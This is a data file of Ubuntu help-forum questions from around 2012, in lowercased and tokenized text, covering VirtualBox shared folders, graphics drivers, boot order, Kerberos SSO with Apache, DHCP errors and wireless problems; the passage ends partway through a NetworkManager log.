103069	shared folder in virtualbox ( ubuntu and windows 7 )	i want to have a directory which is accessible on both windows 7 installed on ubuntu host , and the ubuntu as well . so i have installed the virtualbox additions on both windows and ubuntu . then in ubuntu : sudo mkdir /media/win7share sudo mount -t vboxsf win7share /media/win7share i get : /sbin/mount.vboxsf : mounting failed with the error : no such device what do i need to type in shared folders in virtualbox manager settings ? what do i need to set up on windows ? solution i 've finally found a solution , so here it is as a reference : install guest additions on guest system ( windows ) do not install guest additions on host system ( ubuntu ) add user to vboxsf group : sudo usermod -g vboxsf username note : -g will set the primary group of the user to vboxsf ( replacing whatever default group she belongs to , and changing all files created with it to vboxsf ) . `` -g '' will delete all auxiliary groups of the user ( including `` admin '' ! ) and replace with vboxsf . the safest bet is to use `` -a -g vboxsf username '' , which appends the vboxsf group to current auxiliary groups for that user , changing nothing else . create the dir for the shared docs : mkdir /home/username/shared ( my mistake was to try to put this in /media and trying mounting it - this is not necessary as the newest virtualbox does it for us ) go to the virtualbox options and add the directory /home/username/shared to the shared paths . ( in my case the button was grayed probably due the permissions , now solved in 3 . ) and that 's all . the specified dir will appear in the windows as a new drive . i 'm accepting misery 's answer for the effort he put in writing it , but the most helpful was the link in the comment below posted by takkat .
103070	synergy 's menus go dark about 20 seconds after launching the application	synergy 's menus go dark about 20 seconds after launching the application ( synergy is an awesome cad tool if you were wondering ) . i used to be able to solve this by turning off `` decorations '' in the `` appearance '' settings under gnome-based versions of ubuntu . i 've been fiddling with the compiz settings to try to find similar settings to work around this , but so far i 've had no luck . has anyone else encountered this ? any fixes ? also , does anyone know of a place where i can read what the greying-out or darkening of menus means ? its a very effective form of user feedback , in that it really conveys the sense that something is wrong with the running program . but its also kind of shallow , in that it gives the user no detail about the underlying problem . if a menu goes dark to indicate a problem , is there a log file or something that might provide more detailed clues ? thanks for any help !
103072	why crashes the gnome shell when opening menu/overview ( windows key ) and start typing ?	i previously had my system running with an ati grapgic card , which caused a very instable system . therefore i bought a simple nvidia card which is doing fine , but since then , the gnome shell crashes when opening the gnome shell menu 1 and start typing ! and it is even funnier that it does not crash when typing e.g . `` jd.. '' for jdownloader ! i posted a picture to be sure you know what i mean . thx
103080	remove windows xp after installing ubuntu	ok , i am kind of illiterate when it comes to computers . i have a gateway 6018gz laptop which i loaded ubuntu 11.10 on ... .it has 2 partitions ; one has windows xp and the other ubuntu-how can i delete windows xp from it completely ?
103082	how to partition for dual-boot linux/windows	i just got a new laptop with windows 7 home premium pre-installed and the 750gb hdd already partitioned three ways ( os , data , recovery ) . i 'd like to completely re-partition with ubuntu , swap and one windows partition , but i 'm confused at to what is the best way to do this . i 've been told that windows ' bootloader always wants to reside in the mbr . does this mean i have to install windows before installing ubuntu ( meaning that windows is the first partition on the hdd ) or can it be done so that it 's laid out in the order : ubuntu [ 500gb ] > swap [ 6gb ] > windows [ whatever 's left ] i know that if i install windows after ubuntu , grub will be removed from the mbr , but is it possible then to just re-install grub , or will windows always resist ? thanks .
103094	suddenly webcam of my x300 is not working	i am running ubuntu 11.04 on my thinkpad x300 . my webcam was working fine with skype or gmail video . suddenly it is stopped working . now , no led green light either with skype or gmail video call . i also installed cheese and cheese is reporting that `` no camera found '' . and skype is unable to detect the webcam ( checked in the options ) . i am not sure whether it is a hardware problem or because of one of recent ubuntu updates . please see the information of machine below and help me to fix this . i also did not observe any errors messages related to this in the output of dmesg . $ uname -a linux my-thinkpad 2.6.38-13-generic-pae # 54-ubuntu smp tue jan 3 15:11:05 utc 2012 i686 i686 i386 gnu/linux $ lspci 00:00.0 host bridge : intel corporation mobile pm965/gm965/gl960 memory controller hub ( rev 0c ) 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 0c ) 00:02.1 display controller : intel corporation mobile gm965/gl960 integrated graphics controller ( secondary ) ( rev 0c ) 00:19.0 ethernet controller : intel corporation 82566mm gigabit network connection ( rev 03 ) 00:1a.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 2 ( rev 03 ) 00:1c.2 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 3 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev f3 ) 00:1f.0 isa bridge : intel corporation 82801hbm ( ich8m-e ) lpc interface controller ( rev 03 ) 00:1f.1 ide interface : intel corporation 82801hbm/hem ( ich8m/ich8m-e ) ide controller ( rev 03 ) 00:1f.2 sata controller : intel corporation 82801hbm/hem ( ich8m/ich8m-e ) sata ahci controller ( rev 03 ) 00:1f.3 smbus : intel corporation 82801h ( ich8 family ) smbus controller ( rev 03 ) 03:00.0 network controller : intel corporation pro/wireless 4965 ag or agn [ kedron ] network connection ( rev 61 )
103097	fglrx problem with hl-based applications in wine	i 'm running ubuntu 11.10 with a amd radeon hd 6xxxm series graphiccard . recently i 've had some serious problems with running half life-based applications in wine which all used to work fine . those include counter-strike 1.6 and day of defeat for now . i 'm using steam to play those games . after a while in a multiplayer game the whole xorg crashes , i ca n't do anything and have to hard-reset my computer . and due to that , i 'm sorry to say that i 've been unable to grab a terminal output of the problem . i 've tried different catalyst drivers including 12.1 , 11.12 and 11.10 . i know that i 've had no problems with 11.12 and 11.10 before , but now all of a sudden this happens . also tried different wine versions , 1.4-rc2 , 1.3.37 and 1.3.19 ( which i used to run the applications with before ) . it is also not a `` gameoverlayrenderer.dll '' ( which is a known crash-problem when running games with steam using wine ) i 've changed it off and on helplessly as well as changing compatible windows versions in winecfg . after some serious searching at the web my conclusion is that this might have to do something with running opengl-applications in wine using fglrx . all though , switcihing from opengl to d3d in video settings still hangs xorg . strange thing is that all used to work fine once.. i have yet to find a solution to the problem , any help is appreciated . regards , panska
103098	boot order wo n't change	well , i 've tried almost everything to set my boot order to what i need it to be . but it just wo n't . i changed /etc/default/grub and updated grub , i used the startupmanager i even gave grub-customizer a try each time it says everything 's fine but when i restart my secondary os is shown at first , while it should not be there i 'm using ubuntu 11.10 64bits + jolicloud 1.2 . how do i change the boot order ?
103106	problem with dhcp server in ubuntu server	when i restart the dhcp server , these are the messages that i get from syslog feb 10 19:17:50 mustafa-sr1 dhcpd : all rights reserved . feb 10 19:17:50 mustafa-sr1 dhcpd : for info , please visit https : //www.isc.org/software/dhcp/ feb 10 19:17:50 mustafa-sr1 dhcpd : wrote 0 leases to leases file . feb 10 19:17:50 mustafa-sr1 dhcpd : feb 10 19:17:50 mustafa-sr1 dhcpd : no subnet declaration for eth0:138 ( 0.0.0.0 ) . feb 10 19:17:50 mustafa-sr1 dhcpd : ** ignoring requests on eth0:138 . if this is not what feb 10 19:17:50 mustafa-sr1 dhcpd : you want , please write a subnet declaration feb 10 19:17:50 mustafa-sr1 dhcpd : in your dhcpd.conf file for the network segment feb 10 19:17:50 mustafa-sr1 dhcpd : to which interface eth0:138 is attached . ** feb 10 19:17:50 mustafa-sr1 dhcpd : feb 10 19:17:50 mustafa-sr1 dhcpd : feb 10 19:17:50 mustafa-sr1 dhcpd : not configured to listen on any interfaces !
103110	how to harden a ubuntu desktop ?	we are planning to install 80 ubuntu desktops in a college . the management told us to harden the ubuntu desktop as much as possible , like the user should not able to customize system settings for example changing wallpapers , themes etc etc..could you all pls share your points in hardening a ubuntu system ? so that it will be helpful for me to build a good desktop system . thanks in advance tasks to be done : restrict users changing wallpapers & themes restrict users adding / deleting system panels . restrict users installing / deleting packages . disable usb storage devices . displaying ip address of the system in the background of system wallpaper in bold in right bottom .
103111	how to exclude all hidden files and folders from duplicity backup	how can i set duplicity to exclude all hidden files and folders from backing them up , without specifying each and every one of them ? thank you
103121	ubuntu 11.10 32-bit : not detecting all my ram	system reports 2.6gib , i have 8gb installed in the machine . in previous versions when installing 32 bit versions the grub entry would mention `` pae '' , physical address extension , on the list , but not with this . any chance i can get that set up correctly without doing a reinstall ? system details : i5 2500k on asrock z68m-itx/ht steven @ steven-desktop : ~ $ uname -a linux steven-desktop 3.0.0-12-generic # 20-ubuntu smp fri oct 7 14:50:42 utc 2011 i686 i686 i386 gnu/linux steven @ steven-desktop : ~ $ free -m total used free shared buffers cached mem : 2688 1310 1378 0 113 562 -/+ buffers/cache : 633 2055 swap : 3904 0 3904 steven @ steven-desktop : ~ $
103126	how do i get ati mobility radeon hd 5450 + integrated intel hd to work ?	i have a hp touchsmart tm2150es with hybrid graphics ( ati mobility radeon hd 5450 + integrated intel hd ) . it comes shipped with w7 home premium 64 bits . it has an insyde bios . i have certain experience time using ubuntu linux and i have installed a multiboot system . the fact is that graphics have failed since pendrive install . with natty/ocelot 64 bit installation pendrive , screen turns black or system hangs , unless i modify boot parameters , adding acpi=off . thanks to that i could install ubuntu . then i start with my brand new ubuntu in the hdd , but with the same problem . i have read and tried some stuff : http : //wiki.cchtml.com/index.php/ubuntu_natty_installation_guide this suggests to download and install the last proprietary drivers directly from amd in fedora 's format , convert it to debian 's and install , but takes no better results , because i obtain a graphics card dump and i only can access with ctrl + alt + f1 . i have tried even updating the bios to the last hp 's available version . update : insyde bios do n't give any possibility of changing the operative gpu . i know that the problem is the hybrid architecture , but do n't know how to fix the problem . could someone help me trying anything else ?
103129	how to restore firefox icon in ubuntu 10.10 ?	i have upgraded my ubuntu desktop using the following command , sudo apt-get upgrade after that my firefox version gets changed into 10.0 . for some reason we have run our softwares in firefox version 3.6 . so i have removed the firefox by using the following command . sudo apt-get remove -- purge firefox and reinstalled firefox but again 10.0 got installed . so i have removed it again . and i have downloaded tar.gz file and extracted it . the same is working fine , however my old firefox shortcuts icons were simply showing without default firefox icon . how to bring it back ?
103133	are there drivers for intel gma 4500 integrated graphics for 64-bit ubuntu 11.10 ?	i use the lenovo n500 notebook and i installed on it 64-bit ubuntu 11.10 . all components except the ubuntu recognized the graphics and they appear bugs when playing flash games . do 64-bit ubuntu 11.10 can recognize the intel 4500m integrated graphics ?
103137	how to find out if my system is i386 or x86_64 before installing ubuntu ?	i am using windows as of now and want to install ubuntu . i want to find out if my system is i386 or x86_64 ? how to do that ? thanks .
103146	does removing an application from software center do a remove or a purge	when i remove an application already installed through the software center . does it remove the app the same way as doing a purge to it ( aptitude purge ) or does it remove it like a `` remove '' ( aptitude remove ) .
103148	how can i screencast games in ubuntu with live commentary	sorry for the duplicate question ! i found another similiar question here : how to create a screencast ? but i did not find an answer there i would like to make live commentaries ( record my voice in real-time over the speaker sound ) . is it possible ? i did not find a solution in : instambul ( not configurable ) gtk-recordmydesktop ( not found any setting about it ) xvidcap ( not configurable ) kazam ( low fps ) tibesti ( not installable in oneiric ) tested glc but seems to not work in oneiric ... thanks for your answers and forgive my english ( i 'm italian ! ) kind regards , roberto ! : d
103154	kerberos sso with apache - partly works	ok ... i 've got my apache server running , and i have kerberos configured to integrate with our primary domain controller ( windows 2003 ) . when i try to access my page , however , i get a login prompt ... which i should n't , since this is supposed to be a sso ... when i manually enter my credentials , it works and takes me to the page . however , i 'd like this to use integrated windows authentication . i had this working at one point , but it does n't work anymore ... : s here are my config files . /etc/apache/apache2.conf lockfile $ { apache_lock_dir } /accept.lock pidfile $ { apache_pid_file } timeout 300 keepalive on maxkeepaliverequests 100 keepalivetimeout 5 < ifmodule mpm_prefork_module > startservers 5 minspareservers 5 maxspareservers 10 maxclients 150 maxrequestsperchild 0 < /ifmodule > < ifmodule mpm_worker_module > startservers 2 minsparethreads 25 maxsparethreads 75 threadlimit 64 threadsperchild 25 maxclients 150 maxrequestsperchild 0 < /ifmodule > < ifmodule mpm_event_module > startservers 2 minsparethreads 25 maxsparethreads 75 threadlimit 64 threadsperchild 25 maxclients 150 maxrequestsperchild 0 < /ifmodule > user $ { apache_run_user } group $ { apache_run_group } accessfilename .htaccess < files ~ `` ^\.ht '' > order allow , deny deny from all satisfy all < /files > defaulttype text/plain hostnamelookups off errorlog $ { apache_log_dir } /error.log loglevel warn include mods-enabled/*.load include mods-enabled/*.conf include httpd.conf include ports.conf logformat `` % v : % p % h % l % u % t \ '' % r\ '' % > s % o \ '' % { referer } i\ '' \ '' % { user-agent } i\ '' '' vhost_combined logformat `` % h % l % u % t \ '' % r\ '' % > s % o \ '' % { referer } i\ '' \ '' % { user-agent } i\ '' '' combined logformat `` % h % l % u % t \ '' % r\ '' % > s % o '' common logformat `` % { referer } i - > % u '' referer logformat `` % { user-agent } i '' agent include conf.d/ include sites-enabled/ loadmodule authnz_ldap_module modules/mod_authnz_ldap.so loadmodule ldap_module modules/mod_ldap.so loadmodule auth_kerb_module modules/mod_auth_kerb.so loadmodule auth_pam_module modules/mod_auth_pam.so /etc/apache2/sites-enabled/000-default < virtualhost *:80 > serveradmin webmaster @ localhost documentroot /usr/local/nagios/share/vshell < directory / > options followsymlinks allowoverride none authtype kerberos authname `` kerberos auth '' krbverifykdc off krbmethodnegotiate on krbmethodk5passwd on krbauthrealms company.com krb5keytab /etc/krb5.keytab krbsavecredentials on require valid-user < /directory > < directory /var/www/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/local/nagios/sbin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log loglevel warn customlog $ { apache_log_dir } /access.log combined alias /doc/ `` /usr/share/doc/ '' < directory `` /usr/share/doc/ '' > options indexes multiviews followsymlinks allowoverride none order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory > < /virtualhost > /etc/krb5.conf [ libdefaults ] default_realm = company.com default_tgs_enctypes = aes256-cts aes128-cts arcfour-hmac-md5 des-cbc-md5 des-cbc-crc default_tkt_enctypes = aes256-cts aes128-cts arcfour-hmac-md5 des-cbc-md5 des-cbc-crc permitted_enctypes = aes256-cts aes128-cts arcfour-hmac-md5 des-cbc-md5 des-cbc-crc default_keytab_name = file : /etc/krb5.keytab dns_lookup_realm = true dns_lookup_kdc = true passwd_check_s_address = false udp_preference_limit = 1 ccache_type = 3 kdc_timesync = 0 [ domain_realm ] pdc-2.company2.com = company2.com .company.com = company.com pdc-1.company.com = company.com company.com = company.com sdc-1.company.com = company.com srv-monitor.company.com = company.com [ realms ] company2.com = { kdc = pdc-2.company2.com:88 master_kdc = pdc-2.company2.com:88 kpasswd = pdc-2.company2.com:464 kpasswd_server = pdc-2.company2.com:464 } company.com = { kdc = pdc-1.company.com:88 master_kdc = pdc-1.company.com:88 kpasswd = pdc-1.company.com:464 kpasswd_server = pdc-1.company.com:464 kdc = sdc-1.company.com:88 master_kdc = sdc-1.company.com:88 kpasswd = sdc-1.company.com:464 kpasswd_server = sdc-1.company.com:464 } output of ktutil , rkt /etc/krb5.keytab , l slot kvno principal -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - ktutil : rkt /etc/krb5.keytab ktutil : l slot kvno principal -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 1 3 http/srv-monitor.company.com @ company.com 2 3 http/srv-monitor.company.com @ company.com 3 3 http/srv-monitor.company.com @ company.com 4 3 http/srv-monitor @ company.com 5 3 http/srv-monitor @ company.com 6 3 http/srv-monitor @ company.com what am i missing ! ! ! i 'm this close to getting it , i can feel it ! all i need is to make to login prompt disappear , and for the credentials to be passed automatically . thanks for your time .
103156	how to take screenshot of a windows machine for every 30 minutes ?	how to take screenshots of a windows machine running windows 2008 server from ubuntu 11.04 for every 30 minutes automatically ? right now what i am doing is , i access the windows machine from vnc viewer and capture the screenshot . i would like to automate this process , is it possible ? if yes how ? can anyone explain in detail ?
103161	problem with font in pdf fils ?	i have a problem when you open pdf files in ubuntu where the files appear in the form of letters is understood that i note have installed the language packs . and when you open the file on the windows appear without any problems . any suggest will be appreciated .
103164	rtnetlink answers : operation not supported	i 'm getting some errors in my xen logs and googling has turned up that it 's related to iproute2 . i found through google that the key is to enable config_ip_advanced_router=y in my kernel config . it turns out , that it is . this link provided more clues . http : //superuser.com/questions/232807/iproute2-not-functioning-rtnetlink-answers-operation-not-supported however , all of these options are enabled in my running kernel , but not as statically compiled modules but as linux loadable kernel modules . i 'm guessing i just need to add the appropriate module names to /etc/modules this is what i have in my running kernel config config_netfilter_netlink=m config_netfilter_netlink_queue=m config_netfilter_netlink_log=m config_nf_ct_netlink=m config_scsi_netlink=y config_ip_advanced_router=y config_net_sch_ingress=m config_net_sched=y ip_multiple_tables=y netfilter_xt_target_mark=m what do i need to add to /etc/modules to get this working properly ?
103169	inbox not showing up in thunderbird on ubuntu 11.10	my thunderbird and gmail were working just fine until recently thunderbird started refusing to open my inbox ! when i open thunderbird the following screen shows and i just can not access my e-mails ( from the `` read messages '' link as shown bellow and refuses to open my inbox . what am i doint wrong ?
103171	editing network interfaces without system rebooting	i 'd like to make some changes to my networking configuration by editing my /etc/network/interfaces file . what 's the cleanest way to make changes to this file and have them take effect , without having to reboot ) ? typically , i 've been doing : edit the file service networking restart but i have the impression that this is n't the `` right '' way to make these kinds of changes .
103172	asus eee pc 1215b : washed out display with amd catalyst drivers	i have been having this problem for a while , however lately i have been trying to find ways to make my netbook perform better , visually and functionally . when i use default radeon graphic drivers , my colour profile seems to match that of the one on my windows install , however when i install the catalyst drivers , i get a washed out display that looks like the brightness is too high and the contrast too low . i have playing around with the settings in the catalyst control centre however i could not manage to get the right display . i am using catalyst 11.12 and my graphics card is an amd radeon hd 6310 .
103173	what driver do i need for a radeon mobility hd 2600 series card ?	first of all i have 0 previous experience with any of linux , so i suspect it might be mistake from my part . but it seems that ubuntu 11.10 are not compatible with my graphic card . i have acer laptop with radeon mobility hd 2600 series graphic card and at moment even linux 2d version is running laggy - mouse reaction delay , overheating . the installation of graphic driver fglrx post release update failed with error message guiding me to log file and google search seem to indicate that cause of trouble is that my video card is no longer supported in newest drivers . the question is weather there is solution ( and what it is ) or 11.10 is simply not compatible with my old laptop ?
103175	wireless slow with a bcm4311	i have installed ubuntu 11.10 from a disk bought from your store and run it alongside windows 7 on my lenova 3000 n100 laptop . due to the extreme slowness of the wi-fi it is virtually unusable as the main reason i wanted to run ubuntu is to speed up the time required to enter the internet . i have used 3 or 4 earlier versions of ubuntu and have never experienced this problem before . i had seriously considered removing windows and running linux in total but i find myself wondering whether to delete ubuntu and carry on with windows instead . can you help ? the hardware i believe is as follows thanks : will @ will-3000-n100 : ~ $ sudo lspci 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation n10/ich 7 family pci express port 2 ( rev 02 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) 00:1f.2 ide interface : intel corporation 82801gbm/ghm ( ich7 family ) sata ide controller ( rev 02 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 02 ) 03:00.0 network controller : broadcom corporation bcm4311 802.11a/b/g ( rev 01 ) 05:01.0 ethernet controller : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ ( rev 10 ) 05:04.0 cardbus bridge : ene technology inc cb1410 cardbus controller ( rev 01 ) 05:06.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller 05:06.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 19 ) 05:06.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 0a ) 05:06.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 05 ) 06:00.0 ethernet controller : atheros communications inc. ar2413 802.11bg nic ( rev 01 )
103185	ircd-hybrid operator configuration	i 've installed ircd-hybrid server on ubuntu , configured it , and it 's up and running . i 've configured my operator { } section in /etc/ircd-hybrid/ircd.conf , setting my name , user , and password . but i ca n't for the life of me grab /oper status on my server . can someone please help me with very specific instructions that are working well for them ? thanks !
103187	how do i remove chromium including its settings ?	how do i remove the settings from chromium program in ubuntu 11.10 ? yesterday i tried to remove from synaptic by choosing pull out its configuration . but when i try to install again from usc , the application appears as when last i used yesterday . it means that the application has not fully been removed . is there a clean way to remove these applications ?
103192	having trouble connecting to wireless network	i have problems with connecting to wireless network - eudroam . according to the instructions i should just enter login and password , and that is it . however , later ubuntu asks me about login information again . i talked to technical staff , they told me that on windows , you just login to network and accept installation ssl certificate ( menu pop ups automatically ) . but under ubuntu nothing happens . how can i fix it ? thank you ! edit : i 'm on a thinkpad e420 .
103195	how do i connect to the internet wirelessly ?	so i recently bought a asus u56e-bal7 notebook computer . it came with the following specs : intel core i5 processor 6.00 gb ram intel centrino wireless-n 6150 after installing ubuntu 11.10 i wanted to get some applications for myself and begin using my computer . the main problem i 'm having is connecting to my wireless network . when i click on the icon to connect to wireless networks , it shows me the networks available but i just ca n't connect . i do not get any error messages , but every couple of minutes of trying waiting for it to connect , it tells me to retype my password for my network . i am fairly new to linux-based operating systems so if you have a solution try to dumb it down please . thanks ! the output of tail -f /var/log/messages : may 17 23:19:37 localhost avahi-daemon [ 7383 ] : registering new address record for fe80 : :d2df:9aff : fe62:4a8b on wlan0.* . may 17 23:19:39 localhost dhcpcd [ 14986 ] : wlan0 : sending ipv6 router solicitation may 17 23:19:39 localhost dhcpcd [ 14986 ] : wlan0 : sendmsg : operation not permitted may 17 23:19:40 localhost dhcpcd [ 14986 ] : wlan0 : broadcasting for a lease may 17 23:19:43 localhost dhcpcd [ 14986 ] : wlan0 : sending ipv6 router solicitation may 17 23:19:43 localhost dhcpcd [ 14986 ] : wlan0 : sendmsg : operation not permitted may 17 23:19:46 localhost kernel : [ 4747.346229 ] wlan0 : no ipv6 routers present may 17 23:19:47 localhost dhcpcd [ 14986 ] : wlan0 : sending ipv6 router solicitation may 17 23:19:47 localhost dhcpcd [ 14986 ] : wlan0 : sendmsg : operation not permitted may 17 23:19:47 localhost dhcpcd [ 14986 ] : wlan0 : no ipv6 routers available may 17 23:19:56 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : ip6 addrconf timed out or failed . may 17 23:19:56 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... may 17 23:19:56 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... may 17 23:19:56 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . may 17 23:20:01 localhost cron [ 14995 ] : ( root ) cmd ( test -x /usr/sbin/run-crons & & /usr/sbin/run-crons ) may 17 23:20:05 localhost dhcpcd [ 14986 ] : timed out may 17 23:20:05 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : dhcpv4 client pid 14986 exited with status 1 may 17 23:20:05 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) scheduled ... may 17 23:20:05 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) started ... may 17 23:20:05 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : device state change : ip-config - > failed ( reason 'ip-config-unavailable ' ) [ 70 120 5 ] may 17 23:20:05 localhost networkmanager [ 7271 ] : < warn > activation ( wlan0 ) failed for access point ( netgear ) may 17 23:20:05 localhost networkmanager [ 7271 ] : < warn > activation ( wlan0 ) failed . may 17 23:20:05 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) complete . may 17 23:20:05 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] may 17 23:20:05 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : deactivating device ( reason 'none ' ) [ 0 ] may 17 23:20:05 localhost kernel : [ 4766.863284 ] wlan0 : deauthenticating from c0:3f:0e:17:3f : be by local choice ( reason=3 ) may 17 23:20:05 localhost kernel : [ 4766.888468 ] cfg80211 : calling crda to update world regulatory domain may 17 23:20:05 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : supplicant interface state : completed - > disconnected may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > auto-activating connection 'netgear ' . may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) starting connection 'netgear' may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > activation ( wlan0/wireless ) : access point 'netgear ' has security , but secrets are required . may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : device state change : need-auth - > prepare ( reason 'none ' ) [ 60 40 0 ] may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > activation ( wlan0/wireless ) : connection 'netgear ' has security , and secrets exist . no new secrets needed . may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > config : added 'ssid ' value 'netgear' may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > config : added 'scan_ssid ' value '1' may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > config : added 'bssid ' value 'c0:3f:0e:17:3f : be' may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > config : added 'key_mgmt ' value 'none' may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > config : added 'wep_key0 ' value ' < omitted > ' may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > config : added 'wep_tx_keyidx ' value '0' may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > config : set interface ap_scan to 1 may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning may 17 23:20:09 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating may 17 23:20:09 localhost kernel : [ 4770.989948 ] wlan0 : authenticate with c0:3f:0e:17:3f : be ( try 1 ) may 17 23:20:09 localhost kernel : [ 4770.991905 ] wlan0 : authenticated may 17 23:20:09 localhost networkmanager 